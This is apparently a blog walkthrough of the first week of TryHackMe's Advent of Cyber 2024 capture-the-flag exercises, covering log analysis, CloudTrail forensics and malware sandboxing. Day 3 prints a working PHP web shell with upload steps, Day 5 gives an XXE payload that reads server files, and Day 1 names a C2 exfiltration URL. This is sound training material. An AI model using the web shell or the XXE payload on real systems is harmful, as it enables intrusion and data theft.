Sign in Subscribe
Advent of Cyber

Advent of Cyber 2024: Week 1's Challenges Unwrapped

Week 1 of TryHackMe’s Advent of Cyber 2024 dives into OPSEC failures, vulnerabilities, and malware mischief. Explore SOC-mas tales of glitches, breaches, and cybersecurity triumphs!

Advent of Cyber 2024: Week 1's Challenges Unwrapped
Source: THM's Advent of Cyber 2024
💡
In this year’s Advent of Cyber, can you help McSkidy and the Glitch defend SOC-mas against the evil Mayor Malware’s plans?

SOC-mas is here, and TryHackMe’s Advent of Cyber 2024 has kicked off with a week full of exhilarating challenges! From malicious websites to CloudTrail mishaps, Week 1 puts us on a whirlwind adventure through OPSEC failures, XXE vulnerabilities, and malware mischief. In this write-up, we’ll break down each challenge, uncovering the lessons learned and the joy of mastering the puzzles. Are you ready to dive into the SOC-mas chaos?

Day 1

Maybe SOC-mas music, he thought, doesn't come from a store?

🤖
Glitch and McSkidy stumble across a suspicious website, uncovering poor OPSEC practices that hint at malicious intent. Join them as they investigate, piecing together clues from a poorly secured operation.

Navigate to the ip provided and use the link to convert to mp3

2 Files were extracted from the zip archive, somg.mp3 was a MS Windows shortcut interesting..

Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author? 

Tyler Ramsbey
The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?
Contents of IS.ps1
http://papash3ll.thm/data
Who is M.M? Maybe his Github profile page would provide clues?
The profile of MM-WarevilleTHM
Mayor Malware
What is the number of commits on the GitHub repo where the issue was raised?
💡
Check out the commit history here
1

Day 2

One man's false positive is another man's potpourri.

📉
When unusual login attempts spark concerns, McSkidy and the SOC team dive deep into the logs. What seemed like noise at first might just hold the key to uncovering a hidden threat.
What is the name of the account causing all the failed login attempts?

We first filter for the authentication event category and the failure outcome

service_admin
How many failed logon attempts were observed?

Using the same filter as the previous question, we then filter the correct timeframe given in the context

Timeframe: Nov 29, 2024 @ 00:00:00.000 - Dec 1, 2024 @ 09:30:00.000
6,791
What is the IP address of Glitch?

Knowing that Glitch was able to access ADM-01, we can filter and search for the successful authentication event

10.0.255.1
When did Glitch successfully logon to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS
Dec 1, 2024 08:54:39.000
What is the decoded command executed by Glitch to fix the systems of Wareville?

Filter for event.category: process:

Decode the encoded command as Base64
echo "SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA==" | base64 -d 
Install-WindowsUpdate -AcceptAll -AutoReboot%

Decode with base64 -d

Install-WindowsUpdate -AcceptAll -AutoReboot

Day 3

Even if I wanted to go, their vulnerabilities wouldn't allow it.

💡
At a security conference, Glitch’s excitement turns to dismay as vulnerabilities in their web application are exposed. The SOC team steps in, racing to secure the flaws before they can be exploited.
http://10.10.110.7:5601/

Web Server's IP Address

BLUE: Where was the web shell uploaded to?
Answer format: /directory/directory/directory/filename.php

We can perform a search for shell.php 

/media/images/rooms/shell.php
BLUE: What IP address accessed the web shell?

We can toggle the source IP to be displayed in the columns and search for the use of shel.php

RED: What is the contents of the flag.txt?

Access frostypines.thm after modifying the hosts file

echo "10.10.110.7 frostypines.thm" >> /etc/hosts

Access the login page with admin@frostypines.thm:admin , followed by accessing the admin page. Find the add_room functionality and attempt to upload a reverse shell

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

Upload this as shell.php

http://frostypines.thm/media/images/rooms/shell.php?command=ls

Now we can get flag.txt !

THM{Gl1tch_Was_H3r3}

Technically flag.txt could also be retrieved via direct object reference

http://frostypines.thm/media/images/rooms/flag.txt

Day 4

I’m all atomic inside!

💡
Retracing Glitch’s steps, the SOC team investigates traces left during hasty security fixes. By analyzing breadcrumbs, they uncover critical insights into what went wrong and how to improve security.
What was the flag found in the .txt file that is found in the same directory as the PhishingAttachment.xslm artefact?
Invoke-AtomicTest T1566.001 -TestNumbers 1

Execute Command for T1566.001

Event Viewer View

Navigate to C:\Users\Administrator\AppData\Local\temp and open the txt file:

THM{GlitchTestingForSpearphishing}
What ATT&CK technique ID would be our point of interest?
💡
External research: Look up the MITRE ATT&CK technique ID for Command and Scripting Interpreter.
T1059

Command and Scripting Interpreter Command and Scripting Interpreter

What ATT&CK subtechnique ID focuses on the Windows Command Shell?
 T1059.003

Command and Scripting Interpreter: Windows Command Shell

What is the name of the Atomic Test to be simulated?
💡
Replace the subtechnique placeholder in the command Invoke-AtomicTest subtechnique -ShowDetails with the one found in question 3. Look for Atomic Test Names in regards to malware.
Invoke-AtomicTest T1059.003 -ShowDetails
Simulate BlackByte Ransomware Print Bombing
What is the name of the file used in the test?

Execute Command to get Test Number 4's prerequisites

Invoke-AtomicTest T1059.003 -TestNumbers 4 -GetPrereqs
Wareville_Ransomware.txt
What is the flag found from this Atomic Test?

Invoke the test and open the .pdf file

THM{R2xpdGNoIGlzIG5vdCB0aGUgZW5lbXk=}
echo "R2xpdGNoIGlzIG5vdCB0aGUgZW5lbXk=" | base64 -d
Glitch is not the enemy

Is this a hint?

Day 5

SOC-mas XX-what-ee?

👹
When a critical web application reveals an XXE vulnerability, the SOC team jumps into action. Who introduced the flaw, and how can it be mitigated before it leads to something more catastrophic?
What is the flag discovered after navigating through the wishes?
POST /wishlist.php HTTP/1.1
Host: 10.10.174.219
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/xml
Content-Length: 219
Origin: http://10.10.174.219
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://10.10.174.219/product.php?id=1
Priority: u=0

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_15.txt"> ]>
<wishlist>
	<user_id>1</user_id>
	<item>
	       <product_id>&payload;</product_id>
	</item>
</wishlist>

POST request to get the flag

THM{Brut3f0rc1n6_mY_w4y}
What is the flag seen on the possible proof of sabotage?
Changelog File (http://10.10.174.219/CHANGELOG)
THM{m4y0r_m4lw4r3_b4ckd00rs}

Day 6

If I can't find a nice malware to use, I'm not going.

🦠
Mayor Malware is on the loose, testing the evasion capabilities of his latest creation. The SOC team counters by analyzing the malware in a sandbox environment, uncovering its secrets.
What is the flag displayed in the popup window after the EDR detects the malware?
Detonate the malware in the VM
THM{GlitchWasHere}
What is the flag found in the malstrings.txt document after running floss.exe, and opening the file in a text editor?
floss.exe C:\Tools\Malware\MerryChristmas.exe |Out-file C:\tools\malstrings.txt

Use floss to extract strings from the .exe file

THM{HiddenClue}

Day 7

Oh, no. I'M SPEAKING IN CLOUDTRAIL!

🏆
The chaos continues as the SOC team grapples with anomalies in AWS CloudTrail logs. What’s causing these irregularities, and can the team trace the source before it escalates further?
jq -r '.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]' cloudtrail_log.json

Command to run (listed in guide)

[
  "2024-11-28T15:22:23Z",
  "ListObjects",
  "glitch",
  "wareville-care4wares",
  "N/A",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:25Z",
  "ListObjects",
  "glitch",
  "wareville-care4wares",
  "N/A",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:39Z",
  "PutObject",
  "glitch",
  "wareville-care4wares",
  "bank-details/wareville-bank-account-qr.png",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:39Z",
  "PreflightRequest",
  "N/A",
  "wareville-care4wares",
  "bank-details/wareville-bank-account-qr.png",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:44Z",
  "ListObjects",
  "glitch",
  "wareville-care4wares",
  "N/A",
  "53.94.201.69"
]

Result

What is the other activity made by the user glitch aside from the ListObject action?
PutObject
What is the source IP related to the S3 bucket activities of the user glitch?
53.94.201.69
Based on the eventSource field, what AWS service generates the ConsoleLogin event?
jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"], (.Records[] | select(.sourceIPAddress=="53.94.201.69") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

Command to execute

2024-11-28T15:21:54Z  signin.amazonaws.com                 ConsoleLogin             glitch         53.94.201.69

Results

signin.amazonaws.com
When did the anomalous user trigger the ConsoleLogin event?
2024-11-28T15:21:54
What was the name of the user that was created by the mcskidy user?
glitch
What type of access was assigned to the anomalous user?
jq -r '.Records[] | select(.eventSource == "iam.amazonaws.com") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .requestParameters.policyArn // "N/A"]' cloudtrail_log.json

Extract the .requestParameters.policyArn object with jq

[
  "2024-11-28T15:21:36Z",
  "AttachUserPolicy",
  "mcskidy",
  "N/A",
  "N/A",
  "arn:aws:iam::aws:policy/AdministratorAccess"
]

Result

AdministratorAccess
Which IP does Mayor Malware typically use to log into AWS?
53.94.201.69
What is McSkidy's actual IP address?
jq -r '["Event_Time","Event_Source","Event_Name", "User_Name","User_Agent","Source_IP"],(.Records[] | select(.userIdentity.userName=="mcskidy") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A",.userAgent // "N/A",.sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

Command to run

mcskidy    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36        31.210.15.79

Result

31.210.15.79
What is the bank account number owned by Mayor Malware?
grep INSERT rds.log

Command to run

2024-11-28T15:24:08.743Z 2024-11-28T15:24:08.743625Z	  263 Query	INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('2394 6912 7723 1294', 'Mayor Malware', 322.10)

Result

2394 6912 7723 1294

Week 1 of TryHackMe’s Advent of Cyber 2024 set the stage for an exciting journey through the twists and turns of SOC-mas investigations. From unraveling OPSEC failures and tracking suspicious logins to analyzing vulnerabilities and malware, the challenges highlighted key skills in cybersecurity—vigilance, analysis, and creativity. As the SOC team tackled each scenario, they reminded us of the importance of staying sharp in a constantly evolving threat landscape.

The first week was just a taste of what’s to come. With more challenges on the horizon, the lessons learned here will no doubt build a strong foundation for the weeks ahead. Stay tuned as we continue to uncover the secrets of SOC-mas and dive deeper into the world of cybersecurity sleuthing. Until then, happy hacking!

Read next

Comments ()